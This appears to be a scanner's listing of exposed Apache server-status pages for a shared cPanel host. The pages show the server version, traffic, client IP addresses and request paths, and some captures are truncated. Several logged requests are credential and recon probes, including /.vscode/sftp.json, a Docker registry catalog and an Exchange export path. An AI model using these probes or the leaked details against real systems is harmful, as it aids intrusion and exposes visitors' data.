      93.169.145.96http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      0-9126910/473/9091_
      59.79328267931550.055.411441.70
      87.236.176.214http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2022/02/cropped-Artboard-2-1-192x192.pn
      
      0-9126910/466/8881_
      59.92224219264891700.064.201205.40
      93.169.145.96http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      0-9126910/448/9386_
      59.75538162462150.040.521160.69
      91.92.247.121http/1.13dvi.com:443GET / HTTP/1.0
      
      0-9126910/403/8979_
      59.90227488378372410.049.441698.17
      5.82.249.227http/1.1albayan.edu.sa:443GET /imgweb/1445/4th%20Final%20QB2%20-%20Term%203%20-%202023-20
      
      0-9126910/412/8824_
      59.9420825967948290.021.121578.83
      93.169.145.96http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/fmqmshCRDZwwP1V9S5sdBp
      
      0-9126910/566/8725_
      59.963367119349780.047.871135.39
      144.76.23.140http/1.1wahjcm.com:443GET / HTTP/1.1
      
      0-9126910/481/8799_
      59.93218446704510.039.031261.03
      93.169.145.96http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      0-9126910/559/9143_
      59.91228155850330.042.601538.40
      93.169.145.96http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/gqczNWwWNkfNkUf8b9udpO
      
      0-9126910/561/9179_
      59.715627103471530.0155.441699.65
      66.249.66.64http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-9126910/488/9032_
      59.89233362397950.047.451509.27
      93.169.145.96http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/skXknSzkQSYJEzHIhi1EWt
      
      0-9126910/456/9307_
      59.832942069166270.031.641349.39
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-9126910/508/8775_
      59.81297139221586580.036.991270.46
      51.252.136.55http/1.1albayan.edu.sa:443GET /e_sch/images/Background.jpg HTTP/1.1
      
      0-9126910/629/9032_
      59.75548372686100.046.971356.02
      93.168.139.72http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/thumb_bg.png HTTP/
      
      0-9126910/492/8902_
      59.764645165805510.022.731407.49
      17.241.219.64http/1.1jawad.com.sa:443GET /Page.php HTTP/1.1
      
      0-9126910/628/9105_
      59.77422141162072540.040.101449.07
      31.167.251.213http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1903/%D8%
      
      0-9126910/474/9089_
      59.95152263320700.096.531643.33
      169.148.23.62http/1.1albayan.edu.sa:443GET /e_sch/images/menu_school.jpg HTTP/1.1
      
      1-9277770/585/8261_
      77.15238491409100.082.561662.85
      93.169.145.96http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/B5WmSzFnyJbJc2I1o6o5GK
      
      1-9277770/656/8879_
      77.04517378355720.096.471555.71
      5.156.4.223http/1.1albayan.edu.sa:443GET /web/images/title.jpg HTTP/1.1
      
      1-9277770/655/9059_
      77.0356111475937390.063.371606.96
      93.168.139.72http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      1-9277770/616/8961_
      77.044940107526900.028.271128.70
      31.13.127.19http/1.1albayan.edu.sa:80GET /imgweb/files40/mad-pro.jpg HTTP/1.1
      
      1-9277770/660/8583_
      77.21201073287780.046.051335.87
      66.249.66.40http/1.1hawsab.me:80GET /igdjtff1009qintellectively/hilosvtqo.html HTTP/1.1
      
      1-9277770/856/9071_
      77.08297164723870.078.151250.27
      51.252.136.55http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.ttf HTTP/1.1
      
      1-9277770/632/8649_
      76.99618095845810.025.051434.27
      194.38.23.16http/1.13dvi.com:80GET 
      Found on 2024-06-06 17:14
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831402542e67e

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 06-Jun-2024 19:59:16 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  14 days 15 hours 54 minutes 26 seconds
      Server load: 0.32 0.41 0.41
      Total accesses: 2062449 - Total Traffic: 318.7 GB - Total Duration: 2486860362
      CPU Usage: u1094.94 s127.23 cu8562.85 cs1949.77 - .926% CPU load
      1.63 requests/sec - 263.8 kB/second - 162.0 kB/request - 1205.78 ms/request
      11 requests currently being processed, 0 workers gracefully restarting, 239 idle workers
      ____________K____________K______________________________________
      ________________________K_W______________R___________________WWW
      WWWWWWWWWWWWWWWWWWWWWW________________K________K_______W________
      _______________K__________________________W_______________......
      ...................____K____________________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9126910/498/9772_
      59.531626100381550.062.571383.74
      69.10.48.160http/1.1jawad.com.sa:443GET /ar HTTP/1.1
      
      0-9126910/470/8574_
      59.5216358693590.051.911485.72
      2.90.126.132http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/4ZxKmr7Lnx6PaOYBwrlqP3
      
      0-9126910/483/8864_
      59.57111954582100.079.191259.91
      172.68.192.224http/1.1qr.brunch.ws:443GET /storage/food_image/17088545191116_img8d07b226c7144f5b98ddb
      
      0-9126910/560/8928_
      59.504264390817730.0115.691352.85
      135.148.100.196http/1.1php.we3dvi.com:443GET / HTTP/1.1
      
      0-9126910/468/9241_
      59.6110280190470.059.821383.88
      172.70.242.43http/1.1qr.brunch.ws:443GET /storage/food_image/17162862769554_americano.jpg HTTP/1.1
      
      0-9126910/499/8563_
      59.5910267678480.078.491673.31
      172.70.242.220http/1.1qr.brunch.ws:443GET /storage/food_image/17085173674875_whatsappimage20240221at3
      
      0-9126910/501/8808_
      59.59105113666490.049.991494.48
      172.70.242.27http/1.1qr.brunch.ws:443GET /storage/food_image/17096771907248_minibeefburger.webp HTTP
      
      0-9126910/431/8696_
      59.4962467164070.051.541572.00
      172.69.195.123http/1.1qr.brunch.ws:443GET /storage/food_image/17096776507703_creembrulleh.webp HTTP/1
      
      0-9126910/488/9619_
      59.6110275617330.076.881615.34
      172.70.243.5http/1.1qr.brunch.ws:443GET /storage/food_image/17162865913767_raspberrypistachioespres
      
      0-9126910/472/9090_
      59.6010167931510.055.381441.67
      172.70.242.178http/1.1qr.brunch.ws:443GET /storage/food_image/17096777545967_banana.webp HTTP/1.1
      
      0-9126910/464/8879_
      59.48635264889280.064.111205.31
      172.69.43.154http/1.1qr.brunch.ws:443GET /assets/theme/images/moon.svg HTTP/1.1
      
      0-9126910/447/9385_
      59.5711162462150.040.491160.66
      172.70.243.40http/1.1qr.brunch.ws:443GET /storage/food_image/17096782898832_rebeye.webp HTTP/1.1
      
      0-9126911/402/8978K
      59.620178274740.947.081695.81
      172.71.102.141http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-9126910/410/8822_
      59.4962167941470.020.971578.68
      172.69.194.209http/1.1qr.brunch.ws:443GET /storage/food_image/17088571791773_img22d8f50a73dd4253ba14a
      
      0-9126910/564/8723_
      59.50621119347350.047.791135.31
      172.69.195.32http/1.1qr.brunch.ws:443GET /storage/food_image/17088535367542_imgd0268fa62d0c437fad637
      
      0-9126910/479/8797_
      59.4862246702660.039.001261.01
      172.69.195.161http/1.1qr.brunch.ws:443GET /storage/food_image/17096783054077_trio.webp HTTP/1.1
      
      0-9126910/556/9140_
      59.4687255848990.042.381538.18
      162.158.13.154http/1.1qr.brunch.ws:443GET /storage/food_image/17096770987078_minibeefburger.webp HTTP
      
      0-9126910/560/9178_
      59.54111103471370.0155.441699.64
      172.70.243.157http/1.1qr.brunch.ws:443GET /storage/food_image/17096758957930_falafel.webp HTTP/1.1
      
      0-9126910/481/9025_
      59.6110162394990.046.531508.36
      172.70.243.162http/1.1qr.brunch.ws:443GET /storage/food_image/17162870753282_sparklingwaterlarge.jpg 
      
      0-9126910/455/9306_
      59.6010169165860.031.521349.28
      172.70.242.205http/1.1qr.brunch.ws:443GET /storage/food_image/17096789003777_struwberry.webp HTTP/1.1
      
      0-9126910/501/8768_
      59.60101221583820.036.701270.18
      172.68.192.135http/1.1qr.brunch.ws:443GET /storage/food_image/17096788308104_apple.webp HTTP/1.1
      
      0-9126910/620/9023_
      59.56112472662330.046.121355.17
      172.70.242.114http/1.1qr.brunch.ws:443GET /storage/food_image/17088542817700_imgc01ee519ff8f4d21ab979
      
      0-9126910/491/8901_
      59.58101165804480.022.711407.47
      172.70.243.163http/1.1qr.brunch.ws:443GET /storage/food_image/17088486977532_imgf3cff8b7f41a4f61aae1a
      
      0-9126910/627/9104_
      59.5910362044300.039.661448.63
      172.70.243.134http/1.1qr.brunch.ws:443GET /storage/food_image/17088535367542_imgd0268fa62d0c437fad637
      
      0-9126910/470/9085_
      59.4962163319080.096.381643.18
      172.69.195.83http/1.1qr.brunch.ws:443GET /storage/food_image/17095843937054_frenshomelet.webp HTTP/1
      
      1-9277771/580/8256K
      76.920191403020.881.481661.78
      172.71.102.48http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      1-9277770/654/8877_
      76.8611178354820.096.421555.65
      172.68.192.160http/1.1qr.brunch.ws:443GET /storage/food_image/17095826684933_hallomicroissant.jpg HTT
      
      1-9277770/653/9057_
      76.8611375936180.063.281606.87
      172.70.243.214http/1.1qr.brunch.ws:443GET /storage/food_image/17095827544263_edamcroissant.jpg HTTP/1
      
      1-9277770/615/8960_
      76.87106107526890.028.271128.70
      172.70.242.188http/1.1qr.brunch.ws:443GET /storage/food_image/17088481891935_imgeb2b4322c0164d6c804d5
      
      1-9277770/658/8581_
      76.7962273286600.046.021335.84
      172.69.43.147http/1.1qr.brunch.ws:443GET /storage/food_image/17088457993768_oip6.jpg HTTP/1.1
      
      1-9277770/854/9069_
      76.911046472380</
      Found on 2024-06-06 16:59
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831405e662b1c

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 04-Jun-2024 22:56:11 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  12 days 18 hours 51 minutes 21 seconds
      Server load: 0.41 0.51 0.50
      Total accesses: 1804333 - Total Traffic: 279.7 GB - Total Duration: 2053621298
      CPU Usage: u600.2 s38.95 cu7908.67 cs1809.27 - .938% CPU load
      1.63 requests/sec - 265.5 kB/second - 162.6 kB/request - 1138.16 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 216 idle workers
      _______________K___________________________________K____________
      ___________R__________K________R____...W.....................WWW
      WWWWWWWWWWWWWWWWWWWWWW_K________________________K_______________
      ________..................................................______
      _____________________________K______________W___________________
      _____...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9184670/37/8655_
      4.2111568269870.02.411158.02
      172.70.203.157http/1.1qr.brunch.ws:443GET /assets/fonts/rb.ttf HTTP/1.1
      
      0-9184670/26/7648_
      4.2113639927430.01.631321.16
      172.70.203.156http/1.1qr.brunch.ws:443GET /storage/food_image/17088535992345_img87d03a054fb04c81a8cc3
      
      0-9184670/33/7843_
      4.2013452755370.04.191049.87
      172.70.203.130http/1.1qr.brunch.ws:443GET /storage/food_image/17088535024089_img94fe21be61cd47f8826a0
      
      0-9184670/39/7913_
      4.14141375723160.01.801170.73
      172.70.203.145http/1.1qr.brunch.ws:443GET /storage/food_image/17085193875726_imgbda3904cb18f45a587921
      
      0-9184670/42/8271_
      4.1514272514350.02.881145.32
      172.70.203.157http/1.1qr.brunch.ws:443GET /storage/food_image/17088523246974_imge10c33bc297a444884398
      
      0-9184670/26/7602_
      4.1314261039770.03.971373.78
      172.70.203.152http/1.1qr.brunch.ws:443GET /storage/food_image/17096782407884_seabass.webp HTTP/1.1
      
      0-9184670/18/7841_
      4.12142100133800.01.201389.46
      172.70.203.147http/1.1qr.brunch.ws:443GET /storage/food_image/17088550718992_imgf1df9a3e7ff14f38b4c81
      
      0-9184670/40/7915_
      4.1014260260430.08.961412.13
      172.70.203.146http/1.1qr.brunch.ws:443GET /storage/category_image/17098164579039_13.png HTTP/1.1
      
      0-9184670/24/8608_
      4.1214364773930.06.251422.10
      172.70.203.139http/1.1qr.brunch.ws:443GET /storage/food_image/17088546313133_imga42b7dec0beb4587b22a0
      
      0-9184670/38/8113_
      4.1913559412390.04.251320.00
      172.70.203.149http/1.1qr.brunch.ws:443GET /storage/food_image/17088534061749_img771a2b02697a4cf288e2c
      
      0-9184670/40/8061_
      4.13142258067210.02.541042.57
      172.70.203.131http/1.1qr.brunch.ws:443GET /storage/category_image/17098166111181_21.png HTTP/1.1
      
      0-9184670/28/8477_
      4.1514257629510.01.27973.04
      172.70.203.139http/1.1qr.brunch.ws:443GET /storage/food_image/17096783615789_beef.webp HTTP/1.1
      
      0-9184670/17/8064_
      4.1314263496010.00.541528.51
      172.70.203.144http/1.1qr.brunch.ws:443GET /storage/food_image/17095847457971_maisonbendect.jpg HTTP/1
      
      0-9184670/22/7923_
      4.1014461589320.059.611351.26
      172.70.203.146http/1.1qr.brunch.ws:443GET /storage/category_image/17098166015403_20.png HTTP/1.1
      
      0-9184670/20/7736_
      4.17145106973290.01.331007.77
      172.70.203.135http/1.1qr.brunch.ws:443GET /storage/food_image/17088485656116_img57899913fc4c405aa2742
      
      0-9184671/19/7704K
      4.210140141520.71.601078.18
      172.71.94.189http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      0-9184670/18/7931_
      4.1314249599430.00.461336.27
      172.70.203.138http/1.1qr.brunch.ws:443GET /storage/food_image/17088542497417_imgce640657459b4ca982b52
      
      0-9184670/14/8171_
      4.1813496998730.00.171446.37
      172.70.203.148http/1.1qr.brunch.ws:443GET /storage/food_image/17088534426502_img42a4152548b44f0e8731d
      
      0-9184670/21/8123_
      4.1214157005740.00.771389.66
      172.70.203.134http/1.1qr.brunch.ws:443GET /storage/food_image/17095844876687_promodoro.jpg HTTP/1.1
      
      0-9184670/23/8231_
      4.1514261267310.010.671259.70
      172.70.203.152http/1.1qr.brunch.ws:443GET /storage/food_image/17088526154753_img417ac9265ec848f69f20f
      
      0-9184670/23/7601_
      4.16144219213150.04.111133.54
      172.70.203.147http/1.1qr.brunch.ws:443GET /storage/food_image/17088571791773_img22d8f50a73dd4253ba14a
      
      0-9184670/18/7951_
      4.1414265034080.02.241221.13
      172.70.203.145http/1.1qr.brunch.ws:443GET /storage/food_image/17088475115053_img17bdcc1308974f8591ad5
      
      0-9184670/29/7899_
      4.1713559025670.03.671311.54
      172.70.203.148http/1.1qr.brunch.ws:443GET /storage/food_image/17085203627110_imgba5677885d994e3f8d943
      
      0-9184670/27/8034_
      4.1614459088320.011.371318.60
      172.70.203.153http/1.1qr.brunch.ws:443GET /storage/food_image/17088484233758_imgacf71be0991e4e4186ad5
      
      0-9184670/22/8065_
      4.1014258274550.02.951481.80
      172.70.203.144http/1.1qr.brunch.ws:443GET /storage/food_image/17096758612967_zaatarflatbread.webp HTT
      
      1-9213460/1/7161_
      0.0513784780520.00.011492.10
      172.70.203.157http/1.1qr.brunch.ws:443GET /storage/food_image/17088544068106_imge898a9bef8f942f99cf7c
      
      1-9213460/1/7766_
      0.0513771081440.00.011396.21
      172.70.203.144http/1.1qr.brunch.ws:443GET /storage/food_image/17088481891935_imgeb2b4322c0164d6c804d5
      
      1-9213460/1/7968_
      0.05136168089840.00.041499.59
      5.82.174.205http/1.1albayan.edu.sa:443GET /web/352.html2 HTTP/1.1
      
      1-9213460/1/7841_
      0.0602103387430.00.07989.53
      172.71.182.211http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-9213460/0/7521_
      0.0018367517640.00.001233.41
      162.158.129.46http/1.1qr.brunch.ws:443GET /storage/food_image/17096771367772_fajita.webp HTTP/1.1
      
      1-9213460/0/7639_
      0.0018261636340.00.001123.46
      162.158.130.22http/1.1
      Found on 2024-06-04 19:56
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a8314038de0ab6

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 04-Jun-2024 21:54:42 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  12 days 17 hours 49 minutes 52 seconds
      Server load: 0.34 0.42 0.41
      Total accesses: 1798710 - Total Traffic: 278.3 GB - Total Duration: 2048274922
      CPU Usage: u1018.95 s135.33 cu7463.93 cs1706.22 - .938% CPU load
      1.63 requests/sec - 265.1 kB/second - 162.2 kB/request - 1138.75 ms/request
      12 requests currently being processed, 0 workers gracefully restarting, 238 idle workers
      ________________K______________________K___________R____________
      _______W_______________K____R_______K__W_____________________WWW
      WWWWWWWWWWWWWWWWWWWWWW_______________K__________________________
      K____________________________________________K____________......
      ..................._____________________K___....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-955050/619/8598_
      73.1930068172590.0103.641155.21
      31.167.20.22http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      0-955050/584/7593_
      72.80571339850600.0197.211318.75
      93.168.90.251http/1.1
      
      0-955050/585/7789_
      73.0747171852514240.076.541034.45
      66.249.64.12http/1.1albayan.edu.sa:443GET /imgweb/Books/%D9%85%D9%83%D8%AA%D8%A8%D8%A9%20%D9%86%D9%88
      
      0-955050/584/7859_
      73.0362480375218290.0104.781141.16
      46.184.89.255http/1.1garndhabi.org:80GET /api/v1/members?city_id=4&page=25 HTTP/1.1
      
      0-955050/792/8213_
      73.0365122172181050.033.711114.72
      168.149.31.3http/1.1albayan.edu.sa:443GET /imgweb/1445/5/2%20-%20%D9%84%D8%BA%D8%AA%D9%8A%20%D8%A7%D9
      
      0-955050/471/7548_
      73.15138258667630.0126.591366.62
      82.145.221.68http/1.1albayan.edu.sa:443GET /imgweb/ahadethaoal1.pdf HTTP/1.1
      
      0-955050/547/7810_
      73.0938911299915520.0131.561386.70
      51.36.113.242http/1.1albayan.edu.sa:443GET /imgweb/files40/tawheed3-2nd.pdf HTTP/1.1
      
      0-955050/590/7865_
      73.2131560190520.0192.401401.86
      45.79.252.141http/1.13dvi.com:443HEAD /home HTTP/1.1
      
      0-955050/549/8548_
      73.08445363908130.0181.001413.84
      94.49.161.55http/1.1jawad.com.sa:443GET /public/front_resources/images/logo-footer.png HTTP/1.1
      
      0-955050/597/8049_
      73.14197259268640.086.111310.04
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1717527085.07617306709289550781
      
      0-955050/584/7973_
      73.1228121257983320.0147.301037.89
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-955050/611/8435_
      72.9383157233350.0131.34962.88
      51.36.171.35http/1.1
      
      0-955050/659/8028_
      73.1857323958874140.0100.921523.96
      51.252.129.173http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A7%D9%84%D9%88%D8%AD%D8%AF%D8%A9%20%D8%A
      
      0-955050/582/7891_
      73.0935013961226820.080.201291.56
      207.246.90.71http/1.1sulaimaniya.edu.sa:80HEAD / HTTP/1.1
      
      0-955050/464/7690_
      73.1797227106828420.081.431002.44
      178.80.143.122http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      0-955050/555/7676_
      73.171004539991620.0101.771074.64
      178.80.143.122http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-955051/570/7896K
      73.220149517900.898.521325.72
      172.71.98.212http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-955050/617/8144_
      73.142405396974120.0113.111445.11
      91.92.243.31http/1.1jawad.com.sa:443GET /wp-content/plugins/wp-catcher/index.php HTTP/1.1
      
      0-955050/724/8091_
      73.04589255157920.0182.501388.39
      37.243.19.92http/1.1albayan.edu.sa:443GET /e_sch/images/latest_news.jpg HTTP/1.1
      
      0-955050/575/8191_
      73.0265431361189860.048.791248.20
      188.54.26.54http/1.1albayan.edu.sa:443GET /imgweb/1445/%EF%BF%BD%EF%BF%BD%D8%A7%D8%B3%D8%A6%D9%84%D8%
      
      0-955050/516/7551_
      72.86344488218495770.097.971104.28
      51.36.43.184http/1.1
      
      0-955050/554/7909_
      73.04532064992580.061.501217.73
      52.167.144.234http/1.1albayan.edu.sa:80GET /albayan_library/Categorys3.php?sec=1592 HTTP/1.1
      
      0-955050/613/7851_
      73.054961956971420.070.071306.27
      54.36.148.53http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=924 HTTP/1.1
      
      0-955050/512/7994_
      72.66224159043300.034.231306.96
      178.80.68.107http/1.1
      
      0-955050/547/8026_
      72.8738151057665750.0151.281478.56
      51.36.113.242http/1.1
      
      1-960110/501/7143_
      74.563943684745120.0129.171482.58
      46.184.89.255http/1.1garndhabi.org:80GET /api/v1/auth/user HTTP/1.1
      
      1-960110/706/7738_
      74.5643097371055790.032.481394.11
      51.36.67.255http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A8%D9%86%D9%83%20%D8%A7%D9%84%D8%A7%D8%A
      
      1-960110/607/7952_
      74.554501368044630.0272.001499.00
      46.184.89.255http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      1-960110/608/7826_
      74.6120623103374960.048.21988.85
      66.249.64.131http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=1 HTTP/1.1
      
      1-960110/769/7504_
      74.58288366647920.097.681222.53
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1717526994.34971809387207031250
      
      1-960110/448/7618_
      74.5351264861416440.045.781113.89
      51.253.135.159http/1.1albayan.edu.sa:443GET /imgweb/files40/%D8%A8%D9%86%D9%83%20%D8%A7%D9%84%D8%A7%D8%
      
      1-960110/530/7609_
      74.43660293704830.0213.041349.43
      168.149.31.3http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-960110/458/7577_
      74.68
      Found on 2024-06-04 18:54
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140b93b4dd5

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 03-Jun-2024 03:56:37 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 9
      Parent Server MPM Generation: 8
      Server uptime:  10 days 23 hours 51 minutes 47 seconds
      Server load: 0.23 0.34 0.40
      Total accesses: 1528217 - Total Traffic: 221.9 GB - Total Duration: 1704682974
      CPU Usage: u605.59 s54.12 cu6606.1 cs1458.23 - .918% CPU load
      1.61 requests/sec - 245.0 kB/second - 152.3 kB/request - 1115.47 ms/request
      10 requests currently being processed, 0 workers gracefully restarting, 240 idle workers
      __________________K____________________________K________________
      ____________________K___W_______________________________K____WWW
      WWWWWWWWWWWWWWWWWWWWWW______K___________________________________
      _______K___________K______________________K_____________________
      _______W___________.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-8257790/110/7376_
      19.65172762557342480.033.77968.85
